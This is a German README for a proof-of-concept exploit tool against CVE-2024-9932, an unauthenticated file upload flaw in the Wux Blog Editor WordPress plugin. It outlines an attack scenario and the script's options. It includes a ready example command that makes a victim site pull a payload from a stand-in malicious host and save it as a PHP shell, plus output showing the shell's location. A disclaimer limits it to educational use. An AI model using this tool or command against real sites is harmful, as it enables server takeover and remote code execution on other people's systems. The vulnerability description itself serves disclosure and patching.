
Proof-of-Concept-Exploit für CVE-2024-9932, eine nicht authentifizierte Schwachstelle für willkürlichen Dateiupload im Wux Blog Editor WordPress-Plugin, die die Remotecodeausführung durch das Hochladen bösartiger Dateien ermöglicht.
Das WordPress-Plugin Wux Blog Editor ist aufgrund unzureichender Dateityp-Validierung in der Funktion wuxbt_insertImageNew anfällig für beliebige Datei-Uploads. Betroffen sind Versionen bis einschließlich 3.0.0. Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Dateien auf den Server hochzuladen, was möglicherweise zu Remote Code Execution (RCE) führt.
Die Schwachstelle resultiert aus einer unsachgemäßen Dateityp-Validierung in der Funktion wuxbt_insertImageNew. Dadurch können Angreifer ohne Authentifizierung bösartige Dateien auf den Server hochladen.
Angriffsszenario:
Angreifer identifiziert eine Website, die das anfällige Plugin verwendet.
Nutzt die Datei-Upload-Funktionalität aus, um eine schädliche PHP-Shell hochzuladen.
Führt Befehle auf dem kompromittierten Server aus.
usage:CVE-2024-9932.py [-h] -u URL -ur REMOTE_URL [-n NAME]
Wux Blog Editor - Arbitrary File Upload
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress server, e.g., http://192.168.100.74/wordpress
-ur REMOTE_URL, --remote-url REMOTE_URL
Remote file URL, e.g., http://192.168.100.54/shell.txt
-n NAME, --name NAME Desired file name, e.g., Nxploit.php
python CVE-2024-9932.py -u http://victim-site.com/wordpress -ur http://malicious.com/payload.txt -n shell.php
Beispiel für erfolgreichen Upload
1- Datei gefunden:
2- Ausführungsergebnis: Navigieren Sie zur URL der Datei, um die Payload auszuführen.
[+] File found: http://192.168.100.74/wordpress/wp-content/uploads/2025/01/shell.php
Dieses Tool dient ausschließlich zu Bildungszwecken. Die unbefugte Nutzung dieses Skripts auf Systemen ohne Erlaubnis ist illegal.